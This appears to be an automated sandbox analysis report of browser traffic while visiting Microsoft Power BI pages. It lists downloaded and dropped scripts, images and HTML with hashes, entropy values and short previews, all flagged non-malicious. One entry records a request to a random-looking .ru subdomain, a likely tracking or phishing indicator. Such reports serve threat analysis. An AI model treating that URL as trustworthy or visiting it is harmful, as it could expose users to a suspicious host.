                                                                                                                                    Preview:window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},lpTag.taglets.lightbox=function(){var n="",e={backgroundColor:"#000000",backgroundImage:"",opacity:0,filter:"alpha(opacity=0)",position:"fixed",top:0,left:0,bottom:0,right:0,zIndex:107108};return{_V:"1.3",name:"lightbox",init:function(){},show:function(){var t;(t=lpTag.taglets.lpJsonToDom.convert({containers:{css:e}})[0]).className=t.className+" LPMlightbox",lpTag.taglets.utils.appendToPage(t),n=t.id,t=lpTag.taglets.utils.geObjById(n),lpTag.taglets.lpAnimate.animate(t,{name:"opacity",targetVal:.7},{easing:"easeOutQuart",duration:1e3})},remove:function(){var t,e;t=function(){var e=lpTag.taglets.utils.geObjById(n);if(void 0!==e&&null!=e)try{e.parentNode.removeChild(e)}catch(t){e.style.display="none"}},e=lpTag.taglets.utils.geObjById(n),lpTag.taglets.lpAnimate.animate(e,{name:"opacity",targetVal:0},{easing:"easeOutQuart",duration:1e3,callback:t})}}},window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},function(){functi
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):9539
                                                                                                                                    Entropy (8bit):4.727148213062689
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                                                                                    SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                                                                                    SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                                                                                    SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH9eea5f80fed74a300ccbbaa4dc41df2a.js
                                                                                                                                    Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1010x433, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):141836
                                                                                                                                    Entropy (8bit):7.998448839610485
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:88BC1020A0A4D7DE07CE88CFB3EEFB93
                                                                                                                                    SHA1:381E899D9F3EFBDE28E617A028BBA1D1394BEF36
                                                                                                                                    SHA-256:A04213BCD540BFAD5001C3C71D00DB36CF1C1855271F5EC55F8D82CCF924C481
                                                                                                                                    SHA-512:ACC7F3A564CE5CAAAD65AAF2C9C2B1260193CECC8A5151D2FD5326042CE7A50F691EB076D963CC0A7B36534DA4A007587B9056A94A4D138F40A53FB7292A7851
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF.*..WEBPVP8 .)..P....*....>...A...K...a,.Q....W...|i{".....?.....^.~.=..o...?.~.}..+....o~.............7.......?z.....=.....o...?.~....W......._...?......w....z_................../.......{..................[.../.O.?._....-...............n..|....................q.......o.?..............w.....=.?}...w....._.....M.......g......._.?.x[./.....}...O...?U...'.?...?r?....O.o.'..(?..+...O.............S.......O.........z...{.......i.G.;.....?G?.................../......~..........,.........[._.?............._.......[.....O......U...'.?....B...^.U......._...................>.... .....fj.`..y.).?.m.N..<un..o......\k.........&...(.6.R.8.@.&r...(...._.h...3.x.De.U....9....W..<].|AH.Y.9...s.P.Lm..r!.....9.......L5$....T.%.Z..e...2_9:.'.0.9....a.U.L'_...)Clr83....-..e]....F.......Q..O..;.k@GP./..`r5.u].......<`3N#.....sd.../.....Q...?..mF.yx....^.....X.,.T..=.&j.j....:......Z......a,...+1.an...t......i....t...iG.+K....M...a.b.|.-...E.....&\.3....I$......
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1976
                                                                                                                                    Entropy (8bit):4.4820518319503835
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                                                                                    SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                                                                                    SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                                                                                    SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (29322), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):29322
                                                                                                                                    Entropy (8bit):5.312522003173338
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:89416F80A433C105701781826A74BB42
                                                                                                                                    SHA1:ACDF202A6B4D286A220DCFF7A8639F7E4B44F043
                                                                                                                                    SHA-256:940AF9F2B22109831E80014BF6071CBD08F67E9623804A9B19A0467589046D9A
                                                                                                                                    SHA-512:678D7A9013A50631427EF68555C4C0A34A9DA850CBB3FBF8CE25FDEEBFB38077A4E461A05C5B19BAC30AB62DEEC813534A5210D9A0F3A40DD1CABB433C7D41E9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},lpTag.taglets.lpAnimate={_V:"1.2",name:"lpAnimate",elements:{},queue:{},conf:{interval:13,duration:500,easing:"swing"},init:function(t){if(t)for(var e=0;e<t.length;e++)this.conf[t[e].id]=t[e].value},_supported:{opacity:function(){var t=document.createElement("div");return t.style.cssText="opacity:.1",/^0.1/.test(t.style.opacity)}()},_regExp:{alphaFilter:new RegExp("alpha\\([^)]*\\)","i"),opacityInAlphaFilter:new RegExp("opacity=([^)]*)")},_cssPropHooks:{opacity:{get:function(t){return this._supported.opacity?parseFloat(t.style.opacity):this._regExp.opacityInAlphaFilter.test(t.style.filter)?.01*parseFloat(RegExp.$1):null},set:function(t,e){var n;this._supported.opacity?t.style.opacity=e:(n=t.style.filter||"",e="alpha(opacity="+100*e+")",n=this._regExp.alphaFilter.test(n)?n.replace(this._regExp.alphaFilter,e):n+" "+e,t.style.filter=n)}}},_cssNumber:{zIndex:!0,fontWeight:!0,opacity:!0,zoom:!0,lineHeight:!0,color:!0},_easing:{li
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1238
                                                                                                                                    Entropy (8bit):7.762139796417613
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:E206A414839ECEFD736493FB77DEDEDD
                                                                                                                                    SHA1:204FD11DCEA0FDD54A6547F6093E675691DD5E01
                                                                                                                                    SHA-256:A12055D52F7150061AF6075F344857C1B52CB5DA70CB1A5DA5E515F9ED2E88F3
                                                                                                                                    SHA-512:05FFF8E484715F56FBB3FD46D18C52B0C8050AE9E3E8D30C1DA59B521E634BA45B37947A94C7FABDEC05EC1CA4CE228FD49F234AF43B082A703BC188DBE78DC8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF....WEBPVP8L..../_....Em.1....#..".?..F..@}...lj.UU-.,Fz.IZ.i#....|y.i.}....$........I..m./c..........\._:...~..p..^........U..<...$Yu.33...o....b.Qf<....LQ.$I.$./3...{.|Wit.m[.'...$...V...R%P1...;..6`... ..P.;....1...[...3.....##Xpd.....#...#..;....N#_c.K.|..~..|..b?.#....Y.....Y.W.......3)$.A.p...._.../.....\.pd8.N......|z..'............$......../.p]..:....U...-6..j.*4.....W*.(iR..(.!..J!U..l..D..$. V...JR,...z.....J.+9.EE5P.&...?..Ah5T.;.>..!-......Z)A.(....]w..7.&a...x..A.(.....S..0...o/....N1.F.P...Z% ..lR......(4*.W:.H.J......jR...J.....@b&PRD.... ..d#.3....F.2..(.ImY3...(.5BM...TNb....1#M1.&i.2.....^4...... EZC.j.. "6..........'.a.._..o.}~......a.(E..?].q...ImM......7.....2i.*M...D..N[....,.6tH...>=...jZ=.A.\...k.CS.LM0J8;.Sh..jZ..JJY 2l.0)5..J..jJ#.Z.%.%.@N.(M)E`@.e.4.4...z.....1..!.)..Uk5=D5ATJ. .Fb41.. ..F.5e.Xa...l...Tg..FR%fb.f`.Ih.Q6..0#...1.. .@.....Z......*...L.h& .H..8.n.i..$3...&1..0....$.d.v.;.....$%..)...`...D%.lPC-....FC..cb..D....
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://tbztnyz7p65ro81mjjn8pl20tbe8av4bxaz6erw6vjtxm6goe59fx.lpliwptf.ru/hqehztviuizcugptikqsPqiNSlhKpFXBLKPGQIIJFHQLDCYSOHTDVZEWSTJOUQFPCJBFBMCLPSWQDEKWVBJFUMWI
                                                                                                                                    Preview:1
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (6713)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):175000
                                                                                                                                    Entropy (8bit):5.171768262817175
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B4249CDCF7BE130D20A6DE17BA0E2CA8
                                                                                                                                    SHA1:AA69421E40A3AA834C035BA4BDA3CE0E3CDE7147
                                                                                                                                    SHA-256:266323784F73244890E8ED463927AC9F862E5EA8DCF686F50CAB4B17441D7990
                                                                                                                                    SHA-512:693F145D251384F66D7867BC4E7A4304F54721005678A86A67C3C1650546FDBEAAC177D2EF0B3B95E416AAF9CB7E7FE59C9B7FE61773F94A4CD2C849B0E19087
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-bi
                                                                                                                                    Preview:<!DOCTYPE HTML> <html lang="en-US" dir="ltr"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta http-equiv="x-ua-compatible" content="ie=edge"/> <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/> <meta name="robots" content="index, follow"/> <meta name="template" content="reimagine---pdp-template"/> <meta name="awa-canvasType" content="web"/> <meta name="awa-isTented" content="false"/> <meta name="awa-pgtmp" content="reimagine---pdp-template"/> <meta name="awa-pageType" content="Microsoft Power Platform"/> <meta name="awa-market" content="en-us"/> <meta name="awa-cms" content="AEM"/> <meta name="awa-enabledFeatures" content="contentbackfillgenerate;esiproductcards;feature-controlled-mwf;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsquare;mediapixel;holiday-themer;lazyload-static-components;clientlibDefer;upsellEnabled;contentbackfillpkgdelete;healthcheck;contentbac
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (526)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1683
                                                                                                                                    Entropy (8bit):4.981226266363334
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                                                                                    SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                                                                                    SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                                                                                    SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-market-layer.min.ACSHASH551a5d1b5ebf715e3f78c311a57fa1d7.js
                                                                                                                                    Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):278332
                                                                                                                                    Entropy (8bit):7.999177139339371
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:79D109B3D992B24CA1B3FB6E282AF76A
                                                                                                                                    SHA1:00FBF4A4E53CCE6E9699BA0043D1728AB7D6564D
                                                                                                                                    SHA-256:511F5E29B8CB14F59F317904EAE270E6FD6CE7E252CB6D1CCA3043590E3A32C4
                                                                                                                                    SHA-512:0920AC53F37B6BDB1503AF7F6FFCE4A191D5B9D71DC43CF0E80411CB4D9C03C6DF9BD5D08FF4F57A2DB6F7648C3C5AD33BD86C4946E6F1BA1AF70D474472097F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Accordian-04-593X334?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2998&hei=1689&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............>"...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................>*mdat........Lp@CA.2....0......6H..O...S\.t......,..Jm.\..h?.}.n.+...].$...)K.:.'....Dm..q..Wft.:........~R<C.......c{...*..t.N{V........F}...{.....-.2h.,Y.....b.......KK9c..O.^.Wc.b..-...F.k...[$.a }...a.9@B...T../.<.....0.....MU...9A..h.,......J.gFZB...H.e.T.[..Fh#D.{.x.Y...Q.......?U. c)..^.^..U,r..NW../.>.l.x.cy.hgs....." l...#j..:v..w............x.._..{........j@l...-q..{gq.*v.Z.V..$t...SSH.....t.......:.P!.%..X..7P..8..._%u...s...Y.T.iD..].:.."..9.b..n-.f3......y...cm..8S..p...A.....@..k..>...:.1.H...x.@G..y{2.......}.wd.m.).r.k...X.ZT.L%c.P.G=.U..a...-B:.;...4..m3..y..)...o......_.....I.-g. kn.TQG-#..[.h8.>.{N...v...~.ZD......(.o..|7Y?K.+....Q22.,.P.)..n_.}..~.}^aT..A!.n5F
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):8755
                                                                                                                                    Entropy (8bit):7.957046074835096
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:125A6779242132EEA9A8DDAB98306274
                                                                                                                                    SHA1:7A8246AEB7B39058C21BF90B56FFF64EE3AC7143
                                                                                                                                    SHA-256:64ECCFC118015562FCFC32EB06A4B7CF37FA5450BCFF9899C9DBC16D0C915DC5
                                                                                                                                    SHA-512:5FC49ACBC634B0BF07A91104EACB00B086BDA44947FFF4B6D09EBEEBBA5E7C2673B18F93C8697EDFE92E03D96CA3B43639F44A425624433FA7019D3161155C21
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/feature-grid-BG-1600X724?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=724&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............!....(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma.................!!mdat.....*q.......2.BD........S...J.. ...........!......|..V..<.....`..O.....Q..&].$..;?5..).cEH.S.t._...Z!}..].-y.5C.,..H..rh.{(s..".=.....<.....EX..k8.f.z!.H..g..|..D.....d..C.kd.#..^P..`..A/k\.j....Q7v......2<q>..51.e2..}".z..C..L$y...i.......?j=.....a..0..i..eVh@u..R.....a...."....d+.:.ON?......e.T.@.4.!...e..Z..c@..d...K.....Kp.;8x...j...s...!jd?..`!...H........p..`...?..+......h...?.p...#.7.......Pa.oCv.....ZLo.i&0...N.gk.#..@aA.4.0...y./.Tz..j.!2H!u`Fq...~..b.D..v}.."w[.f....M..a'C....e...*....<J...)d...xA.+.....v.+......C..=.)S.?]J.S.b9.po.`..ic0l{..+.r\..^I.R..6..9.r.iPd.....)x.5,........#.sG>.I.r.O..xJVpB..r.....'...>.nQ|0...*...L'.5.'....d}V...S..r.?(..Fn..;.WMc..+..t.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1489)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1636
                                                                                                                                    Entropy (8bit):5.182678488866879
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:93BAED4E86F6B7686CD4B6406540E99A
                                                                                                                                    SHA1:6C658AE479D5F7205E1220F10591CF5F66AE7AB6
                                                                                                                                    SHA-256:58B5CD9FDB846ECBF4C2FA6A8766ED4C00D808A8B38DBA25B1B3A05452C63050
                                                                                                                                    SHA-512:7CF52DF89092133230191C3BA53BF58F8091503118BB150B7B1947B6D576F5DA55DFBAFA6A4F98F6948B7DB19571EA485B4923BDF15AB04FA5263ECB2C56038B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC86580b4b76fc4faca2bf443d92c6b256-source.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC86580b4b76fc4faca2bf443d92c6b256-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC86580b4b76fc4faca2bf443d92c6b256-source.min.js', "!function(){function r(r,e){if(e)for(var t=0;t<e.length;t++)if(window.location.pathname.startsWith(e[t]))return;if(window.location.pathname.startsWith(r)){var n=document.querySelector(\"[role=main]\")||document.querySelector(\"#mainContent\"),o=document.createElement(\"div\");o.innerHTML=\"<div id='ruBanner' style='background:#0067b8; text-align:center;padding:10px;color:#fff'>\"+u+\"</div>\",n&&null==document.getElementById(\"ruBanner\")&&n.prepend(o)}}var u=\"\\u041c\\u0430\\u0439\\u043a\\u0440\\u043e\\u0441\\u043e\\u0444\\u0442 \\u043f\\u0440\\u0438\\u043e\\u0441\\u0442\\u0430\\u043d\\u043e\\u0432\\u0438\\u043b \\u0432\\u0441\\u0435 \\u043d\\u043e\\u0432\\u044b\\u0435 \\u043f\\u0440\\u043e\\u0
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (26038)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1074949
                                                                                                                                    Entropy (8bit):5.534453277745198
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:26E991089BD1F8A06E99A0E175BBA17D
                                                                                                                                    SHA1:853D7A212931E25E386FC93C74406C97FC0D1750
                                                                                                                                    SHA-256:8B3213F37C7B8A8FF444A97EFA4F783C34B36521B31F98C57671A9642B5D40AF
                                                                                                                                    SHA-512:E06F49F81E854C8856480C2419BFD66199D350C70A1D4B8A81FB6464209A4C2E4C3385A7828C545613A20EE25F9230619D30763A58BB4D14D0E569285DB822B0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/videoplayer/ump.mjs
                                                                                                                                    Preview:// Universal Media Player.// Build Date: 2024-12-11T21:06:34.160Z.// Commit: 2e7813bfaa2d91235468f225d9a635f36570dd33.// Build Number: 20241211.02../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):539663
                                                                                                                                    Entropy (8bit):5.498632862402153
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:3807BC584F85B668CEFC639F73CFF225
                                                                                                                                    SHA1:CF1640047B854F668CF7AAD8637A376AEEDBFE2B
                                                                                                                                    SHA-256:7E7ACABD4A446AF2FCCA9F8D331C77B5659C0601AD7421E2A5DC24A7DDE0BEAB
                                                                                                                                    SHA-512:CF963156B22553DFC480C5A17C3C22719C885FBDBC2BC58F8BA1622A3B17337CAEBEBE24813E1829335FAEA8A30251AFFEDFD6B4A85464300605F6C48184BCA3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:lpTag.callback({"taglets":[{"name":"lpSecureStorage","type":0},{"name":"lp_testingTool","type":0},{"name":"lp_sdes","type":0},{"name":"cobrowse","type":0},{"name":"scraper","type":0},{"name":"lp_ada_enhancements","type":0,"parameters":[{"id":"enhancements","value":"{\"options\":{\"debug\":\"false\"},\"logoCSSFix\":true,\"surveyTabFix\":true,\"headerTextCSSFix\":true,\"menuKeyCloseFix\":true,\"minMaxRoleFix\":true,\"agentIsTypingFix\":true,\"offlineCSSFix\":true,\"inviteKeyCloseFix\":true,\"offlineWindowNarratorFix\":true,\"cancelBtnCSSFix\":true,\"muteBtnNarratorStateFix\":true,\"engagementFix\":true,\"overrideStyles\":{\"cancelBtnCSSFix\":\"color: #000 !important; background: #fff !important;}#lpChatButton a:focus,#lpChat a:focus, #lpChat button:focus, #lpChat input:focus, #lpChat textarea:focus, #lpChat select:focus, #lpChat .lp_textarea_field:focus, .lp_confirm_button:focus, .lp_cancel_button:focus, .lp_action_item:focus, .lp_dialog_input:focus {outline: #000000 dashed 1px !importan
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (590)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1716
                                                                                                                                    Entropy (8bit):5.2304068952006615
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                                    SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                                    SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                                    SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-analytics/v1.min.ACSHASH4cffc2c9b55f8bde649e0d2535a1eebd.js
                                                                                                                                    Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (10026), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):10026
                                                                                                                                    Entropy (8bit):5.547492208446643
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:14CC808391ADCD1021EE431405A2BF0A
                                                                                                                                    SHA1:041E0E332C0E33730C236A86BFFC9121FB042FEF
                                                                                                                                    SHA-256:03B505104E3E8B5C4333F9EC004CF9847664A2115AE0044A26E00F9FD0DE7F70
                                                                                                                                    SHA-512:96C5DC52761A2AD77D538242C2BDF69E4E0DB96700A81585FB8D3397E23A98462E93B20E6E348AB90955227704DD507B3A48F599CF6B236B85D37F43963A4C90
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
